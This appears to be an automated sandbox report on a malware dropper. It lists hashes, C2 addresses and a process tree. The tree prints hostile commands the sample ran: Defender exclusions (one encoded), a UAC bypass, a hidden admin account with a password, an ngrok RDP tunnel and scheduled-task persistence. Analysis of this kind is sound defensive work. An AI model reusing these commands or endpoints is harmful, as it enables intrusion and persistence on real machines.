gh0strat | 9024a6e56532e25f34f6e96fa124048eb099fde8385d44e53bbaf1d36f63b7a1

Analysis

max time kernel
16s
max time network
609s
platform
windows10-1703_x64
resource
win10-20230220-en
resource tags

arch:x64arch:x86image:win10-20230220-enlocale:en-usos:windows10-1703-x64system
submitted
14/05/2023, 18:12

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

a.exe
Size

5KB
MD5

551f6c82be37595d7adc60f3963aa8f8
SHA1

2fcda63f89e8787702d4873c13ec9d009d061bc5
SHA256

9024a6e56532e25f34f6e96fa124048eb099fde8385d44e53bbaf1d36f63b7a1
SHA512

63e613610c9eb3b074c67f130969e6ff7917f239f47eeee3685932ec671bf98c1d0216b6eee2a6e712d1a953c32968fd30bb241809cab97da880c72e918abe97
SSDEEP

48:6Zi2oYDjX9iqhf3FXfkQHjJhyPFlWa8tYDdqIYq/cphuOulavTqXSfbNtm:CNiqp3JkQHyDUtE2AcpisvNzNt

Score

10^/10

gh0strat lokibot raccoon redline sectoprat wshrat 5b7eff386f31487f5db4c7f0e4006546 @crluu7 linda payment evasion infostealer persistence ransomware rat spyware stealer trojan

Malware Config

Extracted

Family

redline

Botnet

Payment

194.87.151.214:2020

Extracted

Family

redline

Botnet

@crluu7

167.235.158.92:45741

Attributes

auth_value
7edd58fa8647e5797eab93a58f7cdd82

Extracted

Family

redline

Botnet

linda

185.161.248.75:4132

Attributes

auth_value
21cdc21d041667b9c1679f88a1146770

Extracted

Family

raccoon

Botnet

5b7eff386f31487f5db4c7f0e4006546

http://165.232.118.86/

xor.plain

Extracted

Family

lokibot

http://171.22.30.164/mancho/five/fre.php

http://kbfvzoboss.bid/alien/fre.php

http://alphastand.trade/alien/fre.php

http://alphastand.win/alien/fre.php

http://alphastand.top/alien/fre.php

Signatures

Gh0st RAT payload 1 IoCs

resource	yara_rule
behavioral1/files/0x000600000001b2d4-10604.dat	family_gh0strat

Gh0strat
Gh0st RAT is a remote access tool (RAT) with its source code public and it has been used by multiple Chinese groups.
rat gh0strat
Lokibot
Lokibot is a Password and CryptoCoin Wallet Stealer.
trojan spyware stealer lokibot
Raccoon
Raccoon is an infostealer written in C++ and first seen in 2019.
stealer raccoon
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine payload 6 IoCs

resource	yara_rule
behavioral1/files/0x000900000001aeb2-130.dat	family_redline
behavioral1/files/0x000900000001aeb2-131.dat	family_redline
behavioral1/memory/4968-142-0x00000000004F0000-0x0000000000518000-memory.dmp	family_redline
behavioral1/files/0x000200000001aec9-147.dat	family_redline
behavioral1/files/0x000200000001aec9-155.dat	family_redline
behavioral1/memory/4068-157-0x00000000002E0000-0x00000000002FE000-memory.dmp	family_redline

SectopRAT
SectopRAT is a remote access trojan first seen in November 2019.
trojan rat sectoprat

SectopRAT payload 3 IoCs

resource	yara_rule
behavioral1/files/0x000200000001aec9-147.dat	family_sectoprat
behavioral1/files/0x000200000001aec9-155.dat	family_sectoprat
behavioral1/memory/4068-157-0x00000000002E0000-0x00000000002FE000-memory.dmp	family_sectoprat

WSHRAT
WSHRAT is a variant of Houdini worm and has vbs and js variants.
trojan wshrat

WSHRAT payload 5 IoCs

resource	yara_rule
behavioral1/files/0x000700000001aed2-192.dat	family_wshrat
behavioral1/files/0x000800000001aecb-188.dat	family_wshrat
behavioral1/files/0x000600000001aee5-249.dat	family_wshrat
behavioral1/files/0x000700000001aee8-396.dat	family_wshrat
behavioral1/files/0x000600000001aee6-504.dat	family_wshrat

Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490
Downloads MZ/PE file
Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489

Executes dropped EXE 8 IoCs

pid	Process
4896	delta-1684054836515-91801792.exe
4968	44444444.exe
3636	windows.exe
1516	server.exe
4068	build.exe
4420	lega.exe
4384	z4293399.exe
2936	z2460872.exe

Uses the VBS compiler for execution 1 TTPs

Scripting
T1064

Adds Run key to start application 2 TTPs 4 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\""	z4293399.exe
Key created	\REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce	RegSvcs.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\""	RegSvcs.exe
Key created	\REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce	z4293399.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Looks up external IP address via web service 8 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
679	checkip.dyndns.org
706	api.ipify.org
708	api.ipify.org
726	api.2ip.ua
117	ip-api.com
163	ip-api.com
247	ip-api.com
396	api.2ip.ua

Launches sc.exe 2 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
7992	sc.exe
5240	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 64 IoCs

pid	pid_target	Process	procid_target
5088	4140	WerFault.exe	106
4432	3652	WerFault.exe	117
1916	4224	WerFault.exe	120
6052	2476	WerFault.exe	135
4516	2232	WerFault.exe	104
5956	2232	WerFault.exe	104
5940	2232	WerFault.exe	104
5568	6044	WerFault.exe	175
5848	2232	WerFault.exe	104
5228	4908	WerFault.exe	123
6964	4184	WerFault.exe	181
1520	6880	WerFault.exe	257
6584	776	WerFault.exe	268
5372	4460	WerFault.exe	271
6352	6500	WerFault.exe	298
7524	1384	WerFault.exe	290
3984	7976	WerFault.exe	477
7636	7976	WerFault.exe	477
7696	7976	WerFault.exe	477
5912	6068	WerFault.exe	483
5972	7976	WerFault.exe	477
3672	7976	WerFault.exe	477
5484	7976	WerFault.exe	477
1136	7976	WerFault.exe	477
8008	7976	WerFault.exe	477
6092	7976	WerFault.exe	477
1660	7976	WerFault.exe	477
6928	7976	WerFault.exe	477
2124	7976	WerFault.exe	477
4148	7976	WerFault.exe	477
7252	7976	WerFault.exe	477
3376	7976	WerFault.exe	477
1060	7976	WerFault.exe	477
4488	7976	WerFault.exe	477
7700	7976	WerFault.exe	477
5896	7976	WerFault.exe	477
7016	7976	WerFault.exe	477
6884	7976	WerFault.exe	477
6960	7976	WerFault.exe	477
216	7976	WerFault.exe	477
7524	7976	WerFault.exe	477
7840	7976	WerFault.exe	477
2256	7976	WerFault.exe	477
3368	7976	WerFault.exe	477
1932	7976	WerFault.exe	477
8012	7976	WerFault.exe	477
4360	7976	WerFault.exe	477
3668	7976	WerFault.exe	477
7128	7976	WerFault.exe	477
5612	7976	WerFault.exe	477
4180	7976	WerFault.exe	477
4636	7976	WerFault.exe	477
288	7976	WerFault.exe	477
8140	7976	WerFault.exe	477
7592	7976	WerFault.exe	477
8168	7976	WerFault.exe	477
7748	7976	WerFault.exe	477
7132	7976	WerFault.exe	477
6120	7976	WerFault.exe	477
7772	7976	WerFault.exe	477
5152	7976	WerFault.exe	477
4944	7976	WerFault.exe	477
7532	7976	WerFault.exe	477
4160	7976	WerFault.exe	477

Creates scheduled task(s) 1 TTPs 17 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

pid	Process
7188	schtasks.exe
6392	schtasks.exe
6288	schtasks.exe
6336	schtasks.exe
4100	schtasks.exe
6376	schtasks.exe
1204	schtasks.exe
4808	schtasks.exe
6340	schtasks.exe
6876	schtasks.exe
5812	schtasks.exe
6396	schtasks.exe
6352	schtasks.exe
2136	schtasks.exe
5504	schtasks.exe
4888	schtasks.exe
5128	schtasks.exe

Delays execution with timeout.exe 1 IoCs

evasion

pid	Process
628	timeout.exe

Gathers network information 2 TTPs 1 IoCs

Uses commandline utility to view network configuration.

System Information Discovery

T1082

Command-Line Interface

T1059

pid	Process
5960	NETSTAT.EXE

GoLang User-Agent 1 IoCs

Uses default user-agent string defined by GoLang HTTP packages.

description	flow	ioc
HTTP User-Agent header	346	Go-http-client/1.1

Interacts with shadow copies 2 TTPs 1 IoCs

Shadow copies are often targeted by ransomware to inhibit system recovery.

ransomware

File Deletion

T1107

Inhibit System Recovery

T1490

pid	Process
6700	vssadmin.exe

Runs net.exe

Script User-Agent 3 IoCs

Uses user-agent string associated with script host/environment.

description	flow	ioc
HTTP User-Agent header	16	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	17	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	23	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	4616	a.exe

Suspicious use of WriteProcessMemory 23 IoCs

description	pid	Process	procid_target
PID 4616 wrote to memory of 4896	4616	a.exe	67
PID 4616 wrote to memory of 4896	4616	a.exe	67
PID 4616 wrote to memory of 4968	4616	a.exe	69
PID 4616 wrote to memory of 4968	4616	a.exe	69
PID 4616 wrote to memory of 4968	4616	a.exe	69
PID 4616 wrote to memory of 3636	4616	a.exe	70
PID 4616 wrote to memory of 3636	4616	a.exe	70
PID 4616 wrote to memory of 3636	4616	a.exe	70
PID 4616 wrote to memory of 1516	4616	a.exe	71
PID 4616 wrote to memory of 1516	4616	a.exe	71
PID 4616 wrote to memory of 1516	4616	a.exe	71
PID 4616 wrote to memory of 4068	4616	a.exe	72
PID 4616 wrote to memory of 4068	4616	a.exe	72
PID 4616 wrote to memory of 4068	4616	a.exe	72
PID 4616 wrote to memory of 4420	4616	a.exe	74
PID 4616 wrote to memory of 4420	4616	a.exe	74
PID 4616 wrote to memory of 4420	4616	a.exe	74
PID 4420 wrote to memory of 4384	4420	word.exe	75
PID 4420 wrote to memory of 4384	4420	word.exe	75
PID 4420 wrote to memory of 4384	4420	word.exe	75
PID 4384 wrote to memory of 2936	4384	z4293399.exe	76
PID 4384 wrote to memory of 2936	4384	z4293399.exe	76
PID 4384 wrote to memory of 2936	4384	z4293399.exe	76

C:\Users\Admin\AppData\Local\Temp\a.exe
"C:\Users\Admin\AppData\Local\Temp\a.exe"
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4616
- C:\Users\Admin\AppData\Local\Temp\a\delta-1684054836515-91801792.exe
  "C:\Users\Admin\AppData\Local\Temp\a\delta-1684054836515-91801792.exe"
  2⤵
  - Executes dropped EXE
  PID:4896
- C:\Users\Admin\AppData\Local\Temp\a\44444444.exe
  "C:\Users\Admin\AppData\Local\Temp\a\44444444.exe"
  2⤵
  - Executes dropped EXE
  PID:4968
- C:\Users\Admin\AppData\Local\Temp\a\windows.exe
  "C:\Users\Admin\AppData\Local\Temp\a\windows.exe"
  2⤵
  - Executes dropped EXE
  PID:3636
- - C:\Windows\SysWOW64\wscript.exe
    "C:\Windows\System32\wscript.exe" "C:\Users\Admin\AppData\Roaming\lRDdN.vbs"
    3⤵
    PID:4872
  - - C:\Windows\SysWOW64\wscript.exe
      "C:\Windows\System32\wscript.exe" //B "C:\Users\Admin\lRDdN.vbs"
      4⤵
      PID:524
    - - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\windows.js"
        5⤵
        
        PID:4588
- C:\Users\Admin\AppData\Local\Temp\a\server.exe
  "C:\Users\Admin\AppData\Local\Temp\a\server.exe"
  2⤵
  - Executes dropped EXE
  PID:1516
- - C:\Windows\SysWOW64\wscript.exe
    "C:\Windows\System32\wscript.exe" "C:\Users\Admin\AppData\Roaming\JoGjo.vbs"
    3⤵
    PID:2636
  - - C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\windows.js"
      4⤵
      PID:612
- C:\Users\Admin\AppData\Local\Temp\a\build.exe
  "C:\Users\Admin\AppData\Local\Temp\a\build.exe"
  2⤵
  - Executes dropped EXE
  PID:4068
- C:\Users\Admin\AppData\Local\Temp\a\lega.exe
  "C:\Users\Admin\AppData\Local\Temp\a\lega.exe"
  2⤵
  - Executes dropped EXE
  PID:4420
- - C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\z4293399.exe
    C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\z4293399.exe
    3⤵
    - Executes dropped EXE
    - Adds Run key to start application
    - Suspicious use of WriteProcessMemory
    PID:4384
  - - C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\z2460872.exe
      C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\z2460872.exe
      4⤵
      Executes dropped EXE
      PID:2936
    - - C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\o6396993.exe
        
        C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\o6396993.exe
        5⤵
        
        PID:3200
    - - C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\p7191023.exe
        
        C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\p7191023.exe
        5⤵
        
        PID:4140
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4140 -s 948
        6⤵
        Program crash
        
        PID:5088
  - - C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\r2968970.exe
      C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\r2968970.exe
      4⤵
      PID:3204
    - - C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\r2968970.exe
        
        C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\r2968970.exe
        5⤵
        
        PID:1524
    - - C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\r2968970.exe
        
        C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\r2968970.exe
        5⤵
        
        PID:5292
- - C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\s9640592.exe
    C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\s9640592.exe
    3⤵
    PID:5780
  - - C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\s9640592.exe
      C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\s9640592.exe
      4⤵
      PID:5964
  - - C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\s9640592.exe
      C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\s9640592.exe
      4⤵
      PID:4140
    - - C:\Users\Admin\AppData\Local\Temp\41bde21dc7\legends.exe
        
        "C:\Users\Admin\AppData\Local\Temp\41bde21dc7\legends.exe"
        5⤵
        
        PID:3220
      - C:\Users\Admin\AppData\Local\Temp\41bde21dc7\legends.exe
        
        C:\Users\Admin\AppData\Local\Temp\41bde21dc7\legends.exe
        6⤵
        
        PID:6044
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 6044 -s 24
        7⤵
        Program crash
        
        PID:5568
- C:\Users\Admin\AppData\Local\Temp\a\STnew.exe
  "C:\Users\Admin\AppData\Local\Temp\a\STnew.exe"
  2⤵
  PID:3852
- - C:\Windows\SysWOW64\wscript.exe
    "C:\Windows\System32\wscript.exe" Update-su.k.vbe
    3⤵
    PID:4796
  - - C:\hceb\omrs.pif
      "C:\hceb\omrs.pif" bdowlcxofi.xls
      4⤵
      PID:4400
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
        5⤵
        
        PID:2004
- C:\Users\Admin\AppData\Local\Temp\a\crypted%20%282%29.exe
  "C:\Users\Admin\AppData\Local\Temp\a\crypted%20%282%29.exe"
  2⤵
  PID:4100
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
    3⤵
    PID:1328
- C:\Users\Admin\AppData\Local\Temp\a\testing.exe
  "C:\Users\Admin\AppData\Local\Temp\a\testing.exe"
  2⤵
  PID:1648
- - C:\Users\Admin\AppData\Local\Temp\pydllsvv.exe
    "C:\Users\Admin\AppData\Local\Temp\pydllsvv.exe"
    3⤵
    PID:4908
  - - C:\Windows\System32\fodhelper.exe
      "C:\Windows\System32\fodhelper.exe"
      4⤵
      PID:5920
    - - C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe
        
        "PowerShell.exe" -command Add-MpPreference -ExclusionPath C:\
        5⤵
        
        PID:5224
  - - C:\Windows\system32\WerFault.exe
      C:\Windows\system32\WerFault.exe -u -p 4908 -s 2072
      4⤵
      Program crash
      PID:5228
- C:\Users\Admin\AppData\Local\Temp\a\ProtonVPN_v3.0.5.exe
  "C:\Users\Admin\AppData\Local\Temp\a\ProtonVPN_v3.0.5.exe"
  2⤵
  PID:4920
- - C:\Windows\SysWOW64\msiexec.exe
    "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Proton Technologies AG\ProtonVPN 3.0.5\install\ProtonVPN.msi" AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\a\ProtonVPN_v3.0.5.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\a\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1683854699 "
    3⤵
    PID:212
- C:\Users\Admin\AppData\Local\Temp\a\ProtonVPN_3.0.5.exe
  "C:\Users\Admin\AppData\Local\Temp\a\ProtonVPN_3.0.5.exe"
  2⤵
  PID:2596
- C:\Users\Admin\AppData\Local\Temp\a\ppls25.exe
  "C:\Users\Admin\AppData\Local\Temp\a\ppls25.exe"
  2⤵
  PID:5040
- C:\Users\Admin\AppData\Local\Temp\a\vbc.exe
  "C:\Users\Admin\AppData\Local\Temp\a\vbc.exe"
  2⤵
  PID:2012
- - C:\Users\Admin\AppData\Local\Temp\a\vbc.exe
    "C:\Users\Admin\AppData\Local\Temp\a\vbc.exe"
    3⤵
    PID:2168
- C:\Users\Admin\AppData\Local\Temp\a\rhadBxnnruvkl.exe
  "C:\Users\Admin\AppData\Local\Temp\a\rhadBxnnruvkl.exe"
  2⤵
  PID:3692
- - C:\Users\Admin\AppData\Local\Temp\a\rhadBxnnruvkl.exe
    C:\Users\Admin\AppData\Local\Temp\a\rhadBxnnruvkl.exe
    3⤵
    PID:2232
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 2232 -s 844
      4⤵
      Program crash
      PID:4516
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 2232 -s 860
      4⤵
      Program crash
      PID:5956
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 2232 -s 892
      4⤵
      Program crash
      PID:5940
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 2232 -s 852
      4⤵
      Program crash
      PID:5848
- C:\Windows\SysWOW64\netsh.exe
  "C:\Windows\SysWOW64\netsh.exe"
  2⤵
  PID:4404
- - C:\Program Files\Mozilla Firefox\Firefox.exe
    "C:\Program Files\Mozilla Firefox\Firefox.exe"
    3⤵
    PID:2476
  - - C:\Windows\system32\WerFault.exe
      C:\Windows\system32\WerFault.exe -u -p 2476 -s 464
      4⤵
      Program crash
      PID:6052
- C:\Users\Admin\AppData\Local\Temp\a\4496EOhNFImHEZOIsrnCCTmYaysV.exe
  "C:\Users\Admin\AppData\Local\Temp\a\4496EOhNFImHEZOIsrnCCTmYaysV.exe"
  2⤵
  PID:400
- C:\Users\Admin\AppData\Local\Temp\a\vbc (3).exe
  "C:\Users\Admin\AppData\Local\Temp\a\vbc (3).exe"
  2⤵
  PID:5008
- C:\Users\Admin\AppData\Local\Temp\a\vbc (2).exe
  "C:\Users\Admin\AppData\Local\Temp\a\vbc (2).exe"
  2⤵
  PID:3492
- C:\Users\Admin\AppData\Local\Temp\a\Build_2s.exe
  "C:\Users\Admin\AppData\Local\Temp\a\Build_2s.exe"
  2⤵
  PID:4532
- - C:\Windows\System32\fodhelper.exe
    "C:\Windows\System32\fodhelper.exe"
    3⤵
    PID:5744
  - - C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe
      "PowerShell.exe" -command Add-MpPreference -ExclusionPath C:\
      4⤵
      PID:6036
- - C:\Windows\System32\fodhelper.exe
    "C:\Windows\System32\fodhelper.exe"
    3⤵
    PID:3640
  - - C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe
      "PowerShell.exe" -window hidden -command C:\Users\Admin\AppData\Local\Temp\/Snup.bat
      4⤵
      PID:5976
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Snup.bat""
        5⤵
        
        PID:5812
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c WMIC Group Where "SID = 'S-1-5-32-544'" Get Name /Value | Find "="
        6⤵
        
        PID:6776
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        WMIC Group Where "SID = 'S-1-5-32-544'" Get Name /Value
        7⤵
        
        PID:6216
        
        C:\Windows\system32\find.exe
        
        Find "="
        7⤵
        
        PID:6288
      - C:\Windows\system32\net.exe
        
        net user BlackTeam JesF3301asS /add /active:"yes" /expires:"never" /passwordchg:"NO"
        6⤵
        
        PID:7096
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 user BlackTeam JesF3301asS /add /active:"yes" /expires:"never" /passwordchg:"NO"
        7⤵
        
        PID:3200
- - C:\Windows\System32\fodhelper.exe
    "C:\Windows\System32\fodhelper.exe"
    3⤵
    PID:7076
  - - C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe
      "PowerShell.exe" -window hidden -command C:\Users\Admin\AppData\Local\Temp\/ngrok.exe tcp 3389
      4⤵
      PID:5708
    - - C:\Windows\system32\wermgr.exe
        
        "C:\Windows\system32\wermgr.exe" "-outproc" "0" "5708" "1920" "1896" "1916" "0" "0" "1924" "0" "0" "0" "0" "0"
        5⤵
        
        PID:6008
- - C:\Windows\System32\fodhelper.exe
    "C:\Windows\System32\fodhelper.exe"
    3⤵
    PID:3988
- - C:\Windows\System32\fodhelper.exe
    "C:\Windows\System32\fodhelper.exe"
    3⤵
    PID:7408
- C:\Users\Admin\AppData\Local\Temp\a\photo190.exe
  "C:\Users\Admin\AppData\Local\Temp\a\photo190.exe"
  2⤵
  PID:5052
- - C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\v7809371.exe
    C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\v7809371.exe
    3⤵
    PID:2132
  - - C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\v7260805.exe
      C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\v7260805.exe
      4⤵
      PID:2136
    - - C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\a9651253.exe
        
        C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\a9651253.exe
        5⤵
        
        PID:4184
    - - C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\b1662179.exe
        
        C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\b1662179.exe
        5⤵
        
        PID:5196
  - - C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\c3411861.exe
      C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\c3411861.exe
      4⤵
      PID:5140
    - - C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\c3411861.exe
        
        C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\c3411861.exe
        5⤵
        
        PID:5696
      - C:\Users\Admin\AppData\Local\Temp\c3912af058\oneetx.exe
        
        "C:\Users\Admin\AppData\Local\Temp\c3912af058\oneetx.exe"
        6⤵
        
        PID:6664
        
        C:\Users\Admin\AppData\Local\Temp\c3912af058\oneetx.exe
        
        C:\Users\Admin\AppData\Local\Temp\c3912af058\oneetx.exe
        7⤵
        
        PID:6820
- - C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\d9252209.exe
    C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\d9252209.exe
    3⤵
    PID:4396
  - - C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\d9252209.exe
      C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\d9252209.exe
      4⤵
      PID:6380
  - - C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\d9252209.exe
      C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\d9252209.exe
      4⤵
      PID:7028
  - - C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\d9252209.exe
      C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\d9252209.exe
      4⤵
      PID:7052
- C:\Users\Admin\AppData\Local\Temp\a\testing (2).exe
  "C:\Users\Admin\AppData\Local\Temp\a\testing (2).exe"
  2⤵
  PID:3652
- - C:\Windows\system32\WerFault.exe
    C:\Windows\system32\WerFault.exe -u -p 3652 -s 916
    3⤵
    - Program crash
    PID:4432
- C:\Users\Admin\AppData\Local\Temp\a\test2.exe
  "C:\Users\Admin\AppData\Local\Temp\a\test2.exe"
  2⤵
  PID:1740
- C:\Users\Admin\AppData\Local\Temp\a\hgjhkhkkyuuiii.exe
  "C:\Users\Admin\AppData\Local\Temp\a\hgjhkhkkyuuiii.exe"
  2⤵
  PID:4224
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
    "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\AppLaunch.exe"
    3⤵
    PID:220
  - - C:\Windows\SysWOW64\cmd.exe
      "cmd.exe" /C powershell -EncodedCommand "PAAjAHkAMQBuAEcAOABGACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAYQBvAEoAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAOAB6AG0AcwBqAFEAZABTAG8AIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMATABLAHkASABqAFEAbgA2AGkAdQA2AG0AIwA+AA=="
      4⤵
      PID:5384
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -EncodedCommand "PAAjAHkAMQBuAEcAOABGACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAYQBvAEoAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAOAB6AG0AcwBqAFEAZABTAG8AIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMATABLAHkASABqAFEAbgA2AGkAdQA2AG0AIwA+AA=="
        5⤵
        
        PID:5872
  - - C:\Windows\SysWOW64\cmd.exe
      "cmd.exe" /C powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 & powercfg /hibernate off & echo mХЦWЗ & SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "ActivationRule" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f & echo ЮAЦк4oJНхЦeу2яWz5ф
      4⤵
      PID:5280
    - - C:\Windows\SysWOW64\powercfg.exe
        
        powercfg /x -hibernate-timeout-ac 0
        5⤵
        
        PID:5940
    - - C:\Windows\SysWOW64\powercfg.exe
        
        powercfg /x -hibernate-timeout-dc 0
        5⤵
        
        PID:7152
    - - C:\Windows\SysWOW64\powercfg.exe
        
        powercfg /x -standby-timeout-ac 0
        5⤵
        
        PID:6664
    - - C:\Windows\SysWOW64\powercfg.exe
        
        powercfg /x -standby-timeout-dc 0
        5⤵
        
        PID:5580
    - - C:\Windows\SysWOW64\powercfg.exe
        
        powercfg /hibernate off
        5⤵
        
        PID:6776
    - - C:\Windows\SysWOW64\schtasks.exe
        
        SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "ActivationRule" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f
        5⤵
        Creates scheduled task(s)
        
        PID:4808
  - - C:\Windows\SysWOW64\cmd.exe
